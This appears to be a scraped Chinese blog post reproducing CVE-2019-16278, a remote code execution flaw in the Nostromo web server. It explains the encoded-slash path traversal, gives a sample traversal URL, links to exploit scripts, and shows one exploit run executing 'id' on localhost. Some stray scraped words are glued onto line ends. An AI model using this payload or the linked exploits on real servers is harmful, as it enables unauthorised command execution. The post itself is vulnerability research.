[漏洞復現]:CVE-2019-16278 Nostromo web server RCE
漏洞描述
Nostromo web server(nhttpd)是一個開源的web服務器,在Unix系統很是流行。html
漏洞緣由是web服務在對URL進行檢查是在URL被解碼前,攻擊者能夠將/轉換爲%2f就可繞過檢查,以前出現過相似漏洞CVE-2011-0751,POC以下:git
http://www.example.org/..%2flogs/access_log
利用前提github
Nostromo version <= 1.9.6web
漏洞復現
Python POC:https://github.com/sudohyak/exploit/blob/master/CVE-2019-16278/exploit.py服務器
mark@mark-Pc:~/nhttpd-exploits$ ./CVE-2019-16278.sh 127.0.0.1 80 id uid=1000(mark) gid=1000(mark) groups=1000(mark),0(root)
EXP: https://git.sp0re.sh/sp0re/Nhttpd-exploitsui
參考code
https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html?utm_source=webcode.ca&utm_medium=web&utm_campaign=twitter
https://nosec.org/home/detail/3074.htmlserver
相關文章
- 1. Redis-RCE漏洞復現
- 2. [漏洞復現] Apache Solr RCE
- 3. zimbra rce 漏洞復現
- 4. ThinkPHP 5.0.2 - 5.0.23 RCE 漏洞復現
- 5. Jenkins RCE CVE-2019-1003000 漏洞復現
- 6. Webmin<=1.920 RCE 漏洞復現
- 7. Apache Solr JMX服務 RCE 漏洞復現
- 8. 漏洞復現
- 9. Tomcat RCE 漏洞復現(CVE-2019-0232)
- 10. [漏洞復現] CVE-2019-11043 PHP-FPM RCE
- 更多相關文章...
- • ASP Server 對象 - ASP 教程
- • ionic 複選框 - ionic 教程
- • ☆基於Java Instrument的Agent實現
- • Docker容器實戰(一) - 封神Server端技術
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
